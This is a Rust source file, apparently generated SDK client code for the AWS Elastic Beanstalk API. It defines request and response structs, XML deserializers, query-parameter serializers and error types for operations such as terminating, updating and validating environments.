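/// `Tags.member.1.Value`, following the same `member` convention as the other list
/// serializers in this file.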
struct TagsSerializer; impl TagsSerializer { fn serialize(params: &mut Params, name: &str, obj: &Tags) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); TagSerializer::serialize(params, &key, obj); } } } pub type TerminateEnvForce = bool; #[doc="<p>Request to terminate an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct TerminateEnvironmentMessage { #[doc="<p>The ID of the environment to terminate.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to terminate.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>Terminates the target environment even if another environment in the same group is dependent on it.</p>"] pub force_terminate: Option<ForceTerminate>, #[doc="<p>Indicates whether the associated AWS resources should shut down when the environment is terminated:</p> <ul> <li> <p> <code>true</code>: The specified environment as well as the associated AWS resources, such as Auto Scaling group and LoadBalancer, are terminated.</p> </li> <li> <p> <code>false</code>: AWS Elastic Beanstalk resource management is removed from the environment, but the AWS resources continue to operate.</p> </li> </ul> <p> For more information, see the <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/ug/\"> AWS Elastic Beanstalk User Guide. </a> </p> <p> Default: <code>true</code> </p> <p> Valid Values: <code>true</code> | <code>false</code> </p>"] pub terminate_resources: Option<TerminateEnvironmentResources>, } /// Serialize `TerminateEnvironmentMessage` contents to a `SignedRequest`. 
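/// A minimal caller-side sketch (the environment name is hypothetical; the empty prefix
/// matches how the generated client invokes these serializers):
///
/// ```rust,ignore
/// let msg = TerminateEnvironmentMessage {
///     environment_name: Some("my-env".to_string()), // hypothetical name
///     terminate_resources: Some(true),
///     ..Default::default()
/// };
/// let mut params = Params::new();
/// TerminateEnvironmentMessageSerializer::serialize(&mut params, "", &msg);
/// // params: EnvironmentName=my-env, TerminateResources=true
/// ```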
struct TerminateEnvironmentMessageSerializer; impl TerminateEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &TerminateEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.force_terminate { params.put(&format!("{}{}", prefix, "ForceTerminate"), &field_value.to_string()); } if let Some(ref field_value) = obj.terminate_resources { params.put(&format!("{}{}", prefix, "TerminateResources"), &field_value.to_string()); } } } pub type TerminateEnvironmentResources = bool; pub type TimeFilterEnd = String; pub type TimeFilterStart = String; pub type Timestamp = String; struct TimestampDeserializer; impl TimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Timestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type Token = String; struct TokenDeserializer; impl TokenDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Token, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a trigger.</p>"] #[derive(Default,Debug,Clone)] pub struct Trigger { #[doc="<p>The name of the trigger.</p>"] pub name: Option<ResourceId>, } struct TriggerDeserializer; impl TriggerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Trigger, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Trigger::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type TriggerList = Vec<Trigger>; struct TriggerListDeserializer; impl TriggerListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<TriggerList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. 
})) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(TriggerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Request to update an application.</p>"] #[derive(Default,Debug,Clone)] pub struct UpdateApplicationMessage { #[doc="<p>The name of the application to update. If no such application is found, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>A new description for the application.</p> <p>Default: If not specified, AWS Elastic Beanstalk does not update the description.</p>"] pub description: Option<Description>, } /// Serialize `UpdateApplicationMessage` contents to a `SignedRequest`. struct UpdateApplicationMessageSerializer; impl UpdateApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } } } #[derive(Default,Debug,Clone)] pub struct UpdateApplicationResourceLifecycleMessage { #[doc="<p>The name of the application.</p>"] pub application_name: ApplicationName, #[doc="<p>The lifecycle configuration.</p>"] pub resource_lifecycle_config: ApplicationResourceLifecycleConfig, } /// Serialize `UpdateApplicationResourceLifecycleMessage` contents to a `SignedRequest`. struct UpdateApplicationResourceLifecycleMessageSerializer; impl UpdateApplicationResourceLifecycleMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationResourceLifecycleMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); ApplicationResourceLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "ResourceLifecycleConfig"), &obj.resource_lifecycle_config, ); } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct UpdateApplicationVersionMessage { #[doc="<p>The name of the application associated with this version.</p> <p> If no application is found with this name, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error.</p>"] pub application_name: ApplicationName, #[doc="<p>A new description for this version.</p>"] pub description: Option<Description>, #[doc="<p>The name of the version to update.</p> <p>If no application version is found with this label, <code>UpdateApplication</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub version_label: VersionLabel, } /// Serialize `UpdateApplicationVersionMessage` contents to a `SignedRequest`. 
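/// `ApplicationName` and `VersionLabel` are required and always written; `Description` is
/// emitted only when present.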
struct UpdateApplicationVersionMessageSerializer; impl UpdateApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &UpdateApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>The result message containing the options for the specified solution stack.</p>"] #[derive(Default,Debug,Clone)] pub struct UpdateConfigurationTemplateMessage { #[doc="<p>The name of the application associated with the configuration template to update.</p> <p> If no application is found with this name, <code>UpdateConfigurationTemplate</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>A new description for the configuration.</p>"] pub description: Option<Description>, #[doc="<p>A list of configuration option settings to update with the new specified option value.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>A list of configuration options to remove from the configuration set.</p> <p> Constraint: You can remove only <code>UserDefined</code> configuration options. </p>"] pub options_to_remove: Option<OptionsSpecifierList>, #[doc="<p>The name of the configuration template to update.</p> <p> If no configuration template is found with this name, <code>UpdateConfigurationTemplate</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `UpdateConfigurationTemplateMessage` contents to a `SignedRequest`. 
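/// Nested lists are flattened under their field names, so option settings appear as
/// `OptionSettings.member.N.*` and removals as `OptionsToRemove.member.N.*`.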
/// Serialize `UpdateConfigurationTemplateMessage` contents to a `SignedRequest`.
struct UpdateConfigurationTemplateMessageSerializer;
impl UpdateConfigurationTemplateMessageSerializer {
    fn serialize(params: &mut Params, name: &str, obj: &UpdateConfigurationTemplateMessage) {
        let mut prefix = name.to_string();
        if prefix != "" {
            prefix.push_str(".");
        }

        params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name);
        if let Some(ref field_value) = obj.description {
            params.put(&format!("{}{}", prefix, "Description"), &field_value);
        }
        if let Some(ref field_value) = obj.option_settings {
            ConfigurationOptionSettingsListSerializer::serialize(
                params,
                &format!("{}{}", prefix, "OptionSettings"),
                field_value,
            );
        }
        if let Some(ref field_value) = obj.options_to_remove {
            OptionsSpecifierListSerializer::serialize(
                params,
                &format!("{}{}", prefix, "OptionsToRemove"),
                field_value,
            );
        }
        params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name);
    }
}

pub type UpdateDate = String;
struct UpdateDateDeserializer;
impl UpdateDateDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<UpdateDate, XmlParseError> {
        try!(start_element(tag_name, stack));
        let obj = try!(characters(stack));
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

#[doc="<p>Request to update an environment.</p>"]
#[derive(Default,Debug,Clone)]
pub struct UpdateEnvironmentMessage {
    #[doc="<p>The name of the application with which the environment is associated.</p>"]
    pub application_name: Option<ApplicationName>,
    #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk updates the description of this environment.</p>"]
    pub description: Option<Description>,
    #[doc="<p>The ID of the environment to update.</p> <p>If no environment with this ID exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error.</p>"]
    pub environment_id: Option<EnvironmentId>,
    #[doc="<p>The name of the environment to update. If no environment with this name exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p> <p>Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error.</p>"]
    pub environment_name: Option<EnvironmentName>,
    #[doc="<p>The name of the group to which the target environment belongs. Specify a group name only if the environment's name is specified in an environment manifest and not with the environment name or environment ID parameters. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"]
    pub group_name: Option<GroupName>,
    #[doc="<p>If specified, AWS Elastic Beanstalk updates the configuration set associated with the running environment and sets the specified configuration options to the requested value.</p>"]
    pub option_settings: Option<ConfigurationOptionSettingsList>,
    #[doc="<p>A list of custom user-defined configuration options to remove from the configuration set for this environment.</p>"]
    pub options_to_remove: Option<OptionsSpecifierList>,
    #[doc="<p>This specifies the platform version that the environment will run after the environment is updated.</p>"]
    pub solution_stack_name: Option<SolutionStackName>,
    #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk deploys this configuration template to the environment. If no such configuration template is found, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p>"]
    pub template_name: Option<ConfigurationTemplateName>,
    #[doc="<p>This specifies the tier to use to update the environment.</p> <p>Condition: At this time, if you change the tier version, name, or type, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p>"]
    pub tier: Option<EnvironmentTier>,
    #[doc="<p>If this parameter is specified, AWS Elastic Beanstalk deploys the named application version to the environment. If no such application version is found, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error.</p>"]
    pub version_label: Option<VersionLabel>,
}

/// Serialize `UpdateEnvironmentMessage` contents to a `SignedRequest`.
struct UpdateEnvironmentMessageSerializer;
impl UpdateEnvironmentMessageSerializer {
    fn serialize(params: &mut Params, name: &str, obj: &UpdateEnvironmentMessage) {
        let mut prefix = name.to_string();
        if prefix != "" {
            prefix.push_str(".");
        }

        if let Some(ref field_value) = obj.application_name {
            params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value);
        }
        if let Some(ref field_value) = obj.description {
            params.put(&format!("{}{}", prefix, "Description"), &field_value);
        }
        if let Some(ref field_value) = obj.environment_id {
            params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value);
        }
        if let Some(ref field_value) = obj.environment_name {
            params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value);
        }
        if let Some(ref field_value) = obj.group_name {
            params.put(&format!("{}{}", prefix, "GroupName"), &field_value);
        }
        if let Some(ref field_value) = obj.option_settings {
            ConfigurationOptionSettingsListSerializer::serialize(
                params,
                &format!("{}{}", prefix, "OptionSettings"),
                field_value,
            );
        }
        if let Some(ref field_value) = obj.options_to_remove {
            OptionsSpecifierListSerializer::serialize(
                params,
                &format!("{}{}", prefix, "OptionsToRemove"),
                field_value,
            );
        }
        if let Some(ref field_value) = obj.solution_stack_name {
            params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value);
        }
        if let Some(ref field_value) = obj.template_name {
            params.put(&format!("{}{}", prefix, "TemplateName"), &field_value);
        }
        if let Some(ref field_value) = obj.tier {
            EnvironmentTierSerializer::serialize(
                params,
                &format!("{}{}", prefix, "Tier"),
                field_value,
            );
        }
        if let Some(ref field_value) = obj.version_label {
            params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value);
        }
    }
}
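// Sketch of the wire shape this serializer produces (assuming `Params` is the
// query-string map used throughout this crate): nested members are flattened
// into dotted keys rooted at `name`. For an UpdateEnvironmentMessage with a
// tier and one option setting, roughly:
//
//     EnvironmentName                    = "my-env"
//     Tier.Name                          = "WebServer"
//     OptionSettings.member.1.Namespace  = "aws:autoscaling:asg"
//
// The exact keys for nested members come from EnvironmentTierSerializer and
// ConfigurationOptionSettingsListSerializer; the values above are placeholders.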
pub type UserDefinedOption = bool;
struct UserDefinedOptionDeserializer;
impl UserDefinedOptionDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<UserDefinedOption, XmlParseError> {
        try!(start_element(tag_name, stack));
        // Note: `bool::from_str` accepts only "true"/"false"; any other payload panics here.
        let obj = bool::from_str(try!(characters(stack)).as_ref()).unwrap();
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

#[doc="<p>A list of validation messages for a specified configuration template.</p>"]
#[derive(Default,Debug,Clone)]
pub struct ValidateConfigurationSettingsMessage {
    #[doc="<p>The name of the application that the configuration template or environment belongs to.</p>"]
    pub application_name: ApplicationName,
    #[doc="<p>The name of the environment to validate the settings against.</p> <p>Condition: You cannot specify both this and a configuration template name.</p>"]
    pub environment_name: Option<EnvironmentName>,
    #[doc="<p>A list of the options and desired values to evaluate.</p>"]
    pub option_settings: ConfigurationOptionSettingsList,
    #[doc="<p>The name of the configuration template to validate the settings against.</p> <p>Condition: You cannot specify both this and an environment name.</p>"]
    pub template_name: Option<ConfigurationTemplateName>,
}

/// Serialize `ValidateConfigurationSettingsMessage` contents to a `SignedRequest`.
struct ValidateConfigurationSettingsMessageSerializer;
impl ValidateConfigurationSettingsMessageSerializer {
    fn serialize(params: &mut Params, name: &str, obj: &ValidateConfigurationSettingsMessage) {
        let mut prefix = name.to_string();
        if prefix != "" {
            prefix.push_str(".");
        }

        params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name);
        if let Some(ref field_value) = obj.environment_name {
            params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value);
        }
        ConfigurationOptionSettingsListSerializer::serialize(
            params,
            &format!("{}{}", prefix, "OptionSettings"),
            &obj.option_settings,
        );
        if let Some(ref field_value) = obj.template_name {
            params.put(&format!("{}{}", prefix, "TemplateName"), &field_value);
        }
    }
}

#[doc="<p>An error or warning for a desired configuration option value.</p>"]
#[derive(Default,Debug,Clone)]
pub struct ValidationMessage {
    #[doc="<p>A message describing the error or warning.</p>"]
    pub message: Option<ValidationMessageString>,
    #[doc="<p>The namespace to which the option belongs.</p>"]
    pub namespace: Option<OptionNamespace>,
    #[doc="<p>The name of the option.</p>"]
    pub option_name: Option<ConfigurationOptionName>,
    #[doc="<p>An indication of the severity of this message:</p> <ul> <li> <p> <code>error</code>: This message indicates that this is not a valid setting for an option.</p> </li> <li> <p> <code>warning</code>: This message provides information you should take into account.</p> </li> </ul>"]
    pub severity: Option<ValidationSeverity>,
}

struct ValidationMessageDeserializer;
impl ValidationMessageDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessage, XmlParseError> {
        try!(start_element(tag_name, stack));
        let mut obj = ValidationMessage::default();
        loop {
            let next_event = match stack.peek() {
                Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close,
                Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()),
                _ => DeserializerNext::Skip,
            };
            match next_event {
                DeserializerNext::Element(name) => {
                    match &name[..] {
                        "Message" => {
                            obj.message = Some(try!(ValidationMessageStringDeserializer::deserialize("Message", stack)));
                        }
                        "Namespace" => {
                            obj.namespace = Some(try!(OptionNamespaceDeserializer::deserialize("Namespace", stack)));
                        }
                        "OptionName" => {
                            obj.option_name = Some(try!(ConfigurationOptionNameDeserializer::deserialize("OptionName", stack)));
                        }
                        "Severity" => {
                            obj.severity = Some(try!(ValidationSeverityDeserializer::deserialize("Severity", stack)));
                        }
                        _ => skip_tree(stack),
                    }
                }
                DeserializerNext::Close => break,
                DeserializerNext::Skip => {
                    stack.next();
                }
            }
        }
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

pub type ValidationMessageString = String;
struct ValidationMessageStringDeserializer;
impl ValidationMessageStringDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessageString, XmlParseError> {
        try!(start_element(tag_name, stack));
        let obj = try!(characters(stack));
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

pub type ValidationMessagesList = Vec<ValidationMessage>;
struct ValidationMessagesListDeserializer;
impl ValidationMessagesListDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationMessagesList, XmlParseError> {
        let mut obj = vec![];
        try!(start_element(tag_name, stack));
        loop {
            let next_event = match stack.peek() {
                Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close,
                Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()),
                _ => DeserializerNext::Skip,
            };
            match next_event {
                DeserializerNext::Element(name) => {
                    if name == "member" {
                        obj.push(try!(ValidationMessageDeserializer::deserialize("member", stack)));
                    } else {
                        skip_tree(stack);
                    }
                }
                DeserializerNext::Close => {
                    try!(end_element(tag_name, stack));
                    break;
                }
                DeserializerNext::Skip => {
                    stack.next();
                }
            }
        }
        Ok(obj)
    }
}

pub type ValidationSeverity = String;
struct ValidationSeverityDeserializer;
impl ValidationSeverityDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ValidationSeverity, XmlParseError> {
        try!(start_element(tag_name, stack));
        let obj = try!(characters(stack));
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

pub type VersionLabel = String;
struct VersionLabelDeserializer;
impl VersionLabelDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<VersionLabel, XmlParseError> {
        try!(start_element(tag_name, stack));
        let obj = try!(characters(stack));
        try!(end_element(tag_name, stack));
        Ok(obj)
    }
}

pub type VersionLabels = Vec<VersionLabel>;

/// Serialize `VersionLabels` contents to a `SignedRequest`.
struct VersionLabelsSerializer;
impl VersionLabelsSerializer {
    fn serialize(params: &mut Params, name: &str, obj: &VersionLabels) {
        for (index, obj) in obj.iter().enumerate() {
            let key = format!("{}.member.{}", name, index + 1);
            params.put(&key, &obj);
        }
    }
}
pub type VersionLabelsList = Vec<VersionLabel>;
struct VersionLabelsListDeserializer;
impl VersionLabelsListDeserializer {
    #[allow(unused_variables)]
    fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<VersionLabelsList, XmlParseError> {
        let mut obj = vec![];
        try!(start_element(tag_name, stack));
        loop {
            let next_event = match stack.peek() {
                Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close,
                Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()),
                _ => DeserializerNext::Skip,
            };
            match next_event {
                DeserializerNext::Element(name) => {
                    if name == "member" {
                        obj.push(try!(VersionLabelDeserializer::deserialize("member", stack)));
                    } else {
                        skip_tree(stack);
                    }
                }
                DeserializerNext::Close => {
                    try!(end_element(tag_name, stack));
                    break;
                }
                DeserializerNext::Skip => {
                    stack.next();
                }
            }
        }
        Ok(obj)
    }
}

/// Serialize `VersionLabelsList` contents to a `SignedRequest`.
struct VersionLabelsListSerializer;
impl VersionLabelsListSerializer {
    fn serialize(params: &mut Params, name: &str, obj: &VersionLabelsList) {
        for (index, obj) in obj.iter().enumerate() {
            let key = format!("{}.member.{}", name, index + 1);
            params.put(&key, &obj);
        }
    }
}

/// Errors returned by AbortEnvironmentUpdate
#[derive(Debug, PartialEq)]
pub enum AbortEnvironmentUpdateError {
    ///<p>The specified account does not have sufficient privileges for one or more AWS services.</p>
    InsufficientPrivileges(String),
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl AbortEnvironmentUpdateError {
    pub fn from_body(body: &str) -> AbortEnvironmentUpdateError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    "InsufficientPrivilegesException" => AbortEnvironmentUpdateError::InsufficientPrivileges(String::from(parsed_error.message)),
                    _ => AbortEnvironmentUpdateError::Unknown(String::from(body)),
                }
            }
            Err(_) => AbortEnvironmentUpdateError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for AbortEnvironmentUpdateError {
    fn from(err: XmlParseError) -> AbortEnvironmentUpdateError {
        let XmlParseError(message) = err;
        AbortEnvironmentUpdateError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for AbortEnvironmentUpdateError {
    fn from(err: CredentialsError) -> AbortEnvironmentUpdateError {
        AbortEnvironmentUpdateError::Credentials(err)
    }
}

impl From<HttpDispatchError> for AbortEnvironmentUpdateError {
    fn from(err: HttpDispatchError) -> AbortEnvironmentUpdateError {
        AbortEnvironmentUpdateError::HttpDispatch(err)
    }
}

impl fmt::Display for AbortEnvironmentUpdateError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for AbortEnvironmentUpdateError {
    fn description(&self) -> &str {
        match *self {
            AbortEnvironmentUpdateError::InsufficientPrivileges(ref cause) => cause,
            AbortEnvironmentUpdateError::Validation(ref cause) => cause,
            AbortEnvironmentUpdateError::Credentials(ref err) => err.description(),
            AbortEnvironmentUpdateError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            AbortEnvironmentUpdateError::Unknown(ref cause) => cause,
        }
    }
}

/// Errors returned by ApplyEnvironmentManagedAction
#[derive(Debug, PartialEq)]
pub enum ApplyEnvironmentManagedActionError {
    ///<p>A generic service exception has occurred.</p>
    ElasticBeanstalkService(String),
    ///<p>Cannot modify the managed action in its current state.</p>
    ManagedActionInvalidState(String),
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl ApplyEnvironmentManagedActionError {
    pub fn from_body(body: &str) -> ApplyEnvironmentManagedActionError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    "ElasticBeanstalkServiceException" => ApplyEnvironmentManagedActionError::ElasticBeanstalkService(String::from(parsed_error.message)),
                    "ManagedActionInvalidStateException" => ApplyEnvironmentManagedActionError::ManagedActionInvalidState(String::from(parsed_error.message)),
                    _ => ApplyEnvironmentManagedActionError::Unknown(String::from(body)),
                }
            }
            Err(_) => ApplyEnvironmentManagedActionError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for ApplyEnvironmentManagedActionError {
    fn from(err: XmlParseError) -> ApplyEnvironmentManagedActionError {
        let XmlParseError(message) = err;
        ApplyEnvironmentManagedActionError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for ApplyEnvironmentManagedActionError {
    fn from(err: CredentialsError) -> ApplyEnvironmentManagedActionError {
        ApplyEnvironmentManagedActionError::Credentials(err)
    }
}

impl From<HttpDispatchError> for ApplyEnvironmentManagedActionError {
    fn from(err: HttpDispatchError) -> ApplyEnvironmentManagedActionError {
        ApplyEnvironmentManagedActionError::HttpDispatch(err)
    }
}

impl fmt::Display for ApplyEnvironmentManagedActionError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for ApplyEnvironmentManagedActionError {
    fn description(&self) -> &str {
        match *self {
            ApplyEnvironmentManagedActionError::ElasticBeanstalkService(ref cause) => cause,
            ApplyEnvironmentManagedActionError::ManagedActionInvalidState(ref cause) => cause,
            ApplyEnvironmentManagedActionError::Validation(ref cause) => cause,
            ApplyEnvironmentManagedActionError::Credentials(ref err) => err.description(),
            ApplyEnvironmentManagedActionError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            ApplyEnvironmentManagedActionError::Unknown(ref cause) => cause,
        }
    }
}

/// Errors returned by CheckDNSAvailability
#[derive(Debug, PartialEq)]
pub enum CheckDNSAvailabilityError {
    /// An error occurred dispatching the HTTP request
    HttpDispatch(HttpDispatchError),
    /// An error was encountered with AWS credentials.
    Credentials(CredentialsError),
    /// A validation error occurred. Details from AWS are provided.
    Validation(String),
    /// An unknown error occurred. The raw HTTP response is provided.
    Unknown(String),
}

impl CheckDNSAvailabilityError {
    pub fn from_body(body: &str) -> CheckDNSAvailabilityError {
        let reader = EventReader::new(body.as_bytes());
        let mut stack = XmlResponse::new(reader.into_iter().peekable());
        let _start_document = stack.next();
        let _response_envelope = stack.next();
        match XmlErrorDeserializer::deserialize("Error", &mut stack) {
            Ok(parsed_error) => {
                match &parsed_error.code[..] {
                    _ => CheckDNSAvailabilityError::Unknown(String::from(body)),
                }
            }
            Err(_) => CheckDNSAvailabilityError::Unknown(body.to_string()),
        }
    }
}

impl From<XmlParseError> for CheckDNSAvailabilityError {
    fn from(err: XmlParseError) -> CheckDNSAvailabilityError {
        let XmlParseError(message) = err;
        CheckDNSAvailabilityError::Unknown(message.to_string())
    }
}

impl From<CredentialsError> for CheckDNSAvailabilityError {
    fn from(err: CredentialsError) -> CheckDNSAvailabilityError {
        CheckDNSAvailabilityError::Credentials(err)
    }
}

impl From<HttpDispatchError> for CheckDNSAvailabilityError {
    fn from(err: HttpDispatchError) -> CheckDNSAvailabilityError {
        CheckDNSAvailabilityError::HttpDispatch(err)
    }
}

impl fmt::Display for CheckDNSAvailabilityError {
    fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
        write!(f, "{}", self.description())
    }
}

impl Error for CheckDNSAvailabilityError {
    fn description(&self) -> &str {
        match *self {
            CheckDNSAvailabilityError::Validation(ref cause) => cause,
            CheckDNSAvailabilityError::Credentials(ref err) => err.description(),
            CheckDNSAvailabilityError::HttpDispatch(ref dispatch_error) => dispatch_error.description(),
            CheckDNSAvailabilityError::Unknown(ref cause) => cause,
        }
    }
}
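// Sketch of the error body that `from_body` parses (envelope shape assumed
// from the AWS Query protocol; the message text is a placeholder):
//
//     <ErrorResponse>
//         <Error>
//             <Code>InsufficientPrivilegesException</Code>
//             <Message>...</Message>
//         </Error>
//     </ErrorResponse>
//
// A recognized <Code> maps to the matching typed variant; anything else falls
// through to `Unknown`, which carries the raw body for inspection.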
